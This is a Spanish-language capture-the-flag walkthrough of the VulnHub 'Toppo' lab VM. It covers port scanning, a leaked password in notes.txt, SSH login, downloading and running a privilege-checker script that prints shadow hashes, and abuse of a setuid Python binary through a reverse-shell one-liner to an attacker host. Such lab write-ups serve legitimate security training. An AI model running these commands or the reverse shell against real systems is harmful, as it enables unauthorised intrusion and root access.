Esta web utiliza cookies, puedes ver nuestra política de cookies, aquí Si continuas navegando estás aceptándola

Toppo


Nos bajamos la imagen de VBox de VulnHub o de alfaexploit:

https://www.vulnhub.com/entry/toppo-1,245/

http://www.alfaexploit.com/uploads/files/VMs/Toppo.vmdk

Echamos un vistazo a los servicios ofrecidos:

RX4 ☢ /home/kr0m> nmap -sT 192.168.20.103 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

Lanzamos Nikto a ver que nos muestra:

RX4 ☢ /home/kr0m/nikto/program> ./nikto.pl -h http://192.168.20.103
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.103
+ Target Hostname:    192.168.20.103
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Accediendo mediante Firefox vemos que existe un fichero llamado notes.txt

RX4 ☢ /home/kr0m> curl http://192.168.20.103/admin/notes.txt
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

Con un poco de suerte tenemos acceso:

RX4 ☢ /home/kr0m> ssh ted@192.168.20.103
ted@192.168.20.103's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Nos bajamos linuxprivchecker:

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py

python linuxprivchecker.py
[+] Shadow File (Privileged)
    root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
    ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::

El script en python es capaz de dumpear el shadow sin permisos?

ted@Toppo:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Seguimos investigando:

ted@Toppo:~$ ls -la /usr/bin/python
lrwxrwxrwx 1 root root 9 Mar 16  2015 /usr/bin/python -> python2.7

ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7

Ese setUID bueno, una vez mas vemos como unos permisos mal asignados pueden comprometer el sistema entero

Probamos a lanzar una shell desde el interprete de python:

ted@Toppo:~$ python -c "import pty;pty.spawn('/bin/bash')"
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Intentemos una conexión reversa:

RX4 ✺ ~> nc -l -p 1234
ted@Toppo:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.20.114",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
RX4 ✺ ~> nc -l -p 1234
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Autor: Kr0m -- 15/09/2018 19:09:50